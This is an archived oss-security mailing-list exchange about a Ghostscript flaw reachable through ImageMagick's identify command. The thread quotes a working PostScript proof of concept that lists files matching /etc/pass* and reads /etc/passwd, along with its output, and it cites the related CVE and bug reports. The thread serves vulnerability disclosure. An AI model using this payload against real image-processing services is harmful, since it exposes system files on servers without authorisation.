|
Message-ID: <CAJ_zFk+T7TD7Ke=k7kbRbxGfnyARQXX1YxGehshKj11RxQD6BA@mail.gmail.com> Date: Thu, 29 Sep 2016 05:02:19 -0700 From: Tavis Ormandy <taviso@...gle.com> To: oss-security@...ts.openwall.com Subject: Re: ImageMagick identify "d:" hangs On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw@...eb.enyo.de> wrote: > > * Tavis Ormandy: > > > Here is the code I'm testing with (Note: I really don't know much > > postscript - and I hate it). > > > > $ cat test.ps > > /dumpname { > > dup % copy filename > > dup % copy filename > > print % print filename > > (\n) print % print newline > > status % stat filename > > { > > (stat succeeded\n) print > > ( ctime:) print > > 64 string cvs print > > ( atime:) print > > 64 string cvs print > > ( size:) print > > 64 string cvs print > > ( blocks:) print > > 64 string cvs print > > (\n) print > > (\n) print > > }{ > > (unable to stat\n\n) print > > } ifelse > > .libfile % open as library > > { > > (.libfile returned file\n\n) print > > 64 string readstring > > pop % discard result (should proably test) > > print > > (\n) print > > }{ > > (.libfile returned string\n) print > > print > > (\n) print > > } ifelse > > } def > > > > (/etc/pass*) /dumpname load 256 string filenameforall > > filenameforall was fixed as part of this: > > http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8 > http://bugs.ghostscript.com/show_bug.cgi?id=694724 > > This also covers getenv and has already been assigned CVE-2013-5653. Thanks Florian, that explains it, although the distros do not appear to have picked that patch up. > > > $ identify test.ps > > /etc/passwd > > stat succeeded > > ctime:1474998792 atime:1474998792 size:2662 blocks:8 > > > > .libfile returned file > > .libfile is not yet fixed upstream. I reported this upstream: > > http://bugs.ghostscript.com/show_bug.cgi?id=697169 Thanks - seems like bad news for any automated image/document processing. Tavis.
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.